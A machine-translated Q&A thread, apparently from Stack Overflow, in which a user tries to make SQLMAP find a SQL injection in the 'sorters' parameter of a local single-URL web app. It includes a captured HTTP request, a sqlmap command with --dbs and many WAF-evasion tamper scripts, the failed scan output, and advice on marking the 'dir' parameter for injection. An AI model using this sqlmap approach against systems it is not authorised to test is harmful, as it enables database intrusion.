具有单个 URL 应用程序的 SQLMAP

Posted 2023-02-19

【中文标题】具有单个 URL 应用程序的 SQLMAP

【英文标题】：SQLMAP with single URL application

【发布时间】：2020-05-14 07:03:54

【问题描述】：

我有一个本地应用程序，只有在登录后才能访问。它的单一 URL 应用程序，应用程序的 URL 不会改变，只是它使用 'XMLHttpRequest' 根据动作和其他参数刷新屏幕内容。

使用的数据库如下

[root@localhost ~]# mysql -q
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Server version: 5.5.64-MariaDB MariaDB Server

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. 

有 SQL 注入问题的“XMLHttpRequest”和“sorters”字段之一存在此问题，例如，如果我们在“ASC”字段中添加 (')，则页面显示 500 错误。为了重现它，我使用 burp 套件社区版来拦截请求并使用文件将其提供给 SQLMAP。

请求详情

Name    Protocol    Method  Result  Content type    Received    Time    Initiator
http://10.20.100.200/test/api/?aid=E5xr3iOOg8sI1o4Zl1URZ4ytFlAdVTy9AMEiVjC6HhMBVwCkQgee160WtRYidV8Q&action=management&which=overview&_dc=1580104578032&sort=account_name&dir=ASC&sorters=%5B%7B%22field%22%3A%22account_name%22%2C%22direction%22%3A%22ASC%22%7D%5D&start=0&limit=18    HTTP    GET 200 application/json    1.29 KB 677.42 ms   XMLHttpRequest

Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: Keep-Alive
Cookie: client_time=1580129655.074; check=1; aid=E5xr3iOOg8sI1o4Zl1URZ4ytFlAdVTy9AMEiVjC6HhMBVwCkQgee160WtRYidV8Q; bid=4memnc2vdi7pj7i56q5sopu5gbspba99; cid=daSGjWTD0bQ8ZLCNRG4tA1090ddBYYPatzexNHrf4qy4FwB4CcvymjISadYw9Quh
Host: 10.20.100.200
Referer: http://10.20.100.200/test/
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
X-Requested-With: XMLHttpRequest
Connection: close

request.txt 以提供 SQLMAP（在分拣机字段的 ASC 处放置星号 (*)）

GET /api/?aid=E5xr3iOOg8sI1o4Zl1URZ4ytFlAdVTy9AMEiVjC6HhMBVwCkQgee160WtRYidV8Q&action=management&which=overview&_dc=1580104578032&sort=account_name&dir=ASC&sorters=%5B%7B%22field%22%3A%22account_name%22%2C%22direction%22%3A%22ASC*%22%7D%5D&start=0&limit=18 HTTP/1.1
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: http://10.20.100.200/test/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 10.20.100.200
Cookie: client_time=1580129655.074; check=1; uid=E5xr3iOOg8sI1o4Zl1URZ4ytFlAdVTy9AMEiVjC6HhMBVwCkQgee160WtRYidV8Q; sid=4memnc2vdi7pj7i56q5sopu5gbspba99; vid=daSGjWTD0bQ8ZLCNRG4tA1090ddBYYPatzexNHrf4qy4FwB4CcvymjISadYw9Quh

用于 SQL 注入的 SQLMAP 命令

sqlmap.py -r C:\Users\Documents\request.txt --dbs --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

SQLMAP 输出

[00:34:56] [WARNING] URI parameter '#1*' does not appear to be dynamic
[00:34:57] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[00:34:58] [INFO] testing for SQL injection on URI parameter '#1*'
[00:34:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:35:06] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:35:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:35:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:35:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[00:35:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[00:35:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[00:35:16] [INFO] testing 'MySQL inline queries'
[00:35:17] [INFO] testing 'PostgreSQL inline queries'
[00:35:18] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[00:35:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[00:35:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[00:35:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[00:35:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[00:35:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:35:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[00:35:52] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[00:37:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:37:20] [WARNING] URI parameter '#1*' does not seem to be injectable
[00:37:20] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
[00:37:20] [WARNING]  HTTP error codes detected during run:
403 (Forbidden) - 1 times, 400 (Bad Request) - 578 times, 414 (Request-URI Too Long) - 235 times

【问题讨论】：

那么问题来了，为什么您可以手动复制它，但不能使用 SQLMAP？

是的，SQLMAP 无法注入 SQL。我在这里做错了什么？

猜测 SQLMAP 没有在与您手动发送的请求相同的上下文中发送相同的请求。 403 表明可能 SQLMAP 未访问已验证。会话 ID 是否可能已经过期或以其他方式验证失败？如果您让 SQLMAP 记录所有请求和响应数据并研究跟踪，它将对正在发生的事情有所了解。

【参考方案1】：

这里的问题是 SQLMAP 替换了辅助，因此 SQLMAP 请求没有被服务器验证。

我们需要告诉 SQLMAP 排除这些参数，并且我们可以告诉 SQLMAP 通过放置通配符 (*) 来尝试所需的参数，即 dir=ASC*。在这种情况下，SQLMAP 将尝试为 param 'dir' 注入代码

例如

GET /api/?aid=E5xr3iOOg8sI1o4Zl1URZ4ytFlAdVTy9AMEiVjC6HhMBVwCkQgee160WtRYidV8Q&action=management&which=overview&_dc=1580104578032&sort=account_name&dir=ASC*&start=0&limit=18 HTTP/1.1